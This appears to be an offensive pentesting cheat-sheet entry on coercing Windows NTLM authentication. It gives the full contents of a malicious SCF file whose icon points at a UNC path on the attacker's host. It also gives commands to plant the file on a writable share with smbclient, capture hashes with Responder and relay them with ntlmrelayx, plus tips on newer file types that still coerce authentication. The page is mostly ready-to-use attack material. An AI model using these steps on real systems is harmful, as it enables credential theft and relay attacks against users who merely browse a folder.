Windows Explorer resolves icons and resources when it renders a folder. A crafted file that points its icon at a UNC path on the attacker's host makes any user who browses the folder authenticate to that host, leaking their NTLM. SCF (Shell Command File) worked on older Windows; LNK shortcuts with a UNC icon location, and .url and .library-ms files, are the current equivalents.
# evil.scf planted on the writable share (legacy)
[Shell]
Command=2
IconFile=\\<attacker-ip>\share\x.ico
[Taskbar]
Command=ToggleDesktop
# Capture or relay the coerced authentication
# Place the file on the writable share, then listen for the coerced auth
smbclient //<target>/share -U user%pass -c 'put evil.scf'
responder -I eth0
# or relay it straight to another host
ntlmrelayx.py -t smb://<other-target> -smb2support
Exploitation notes#
- The user never clicks anything: rendering the folder triggers the icon fetch and the authentication.
- SCF is blocked on modern Windows, so prefer
.lnkwith a UNCIconLocation, or.url/.library-msfiles, which still coerce. - The captured NTLM is cracked offline or relayed; see Signing and relay.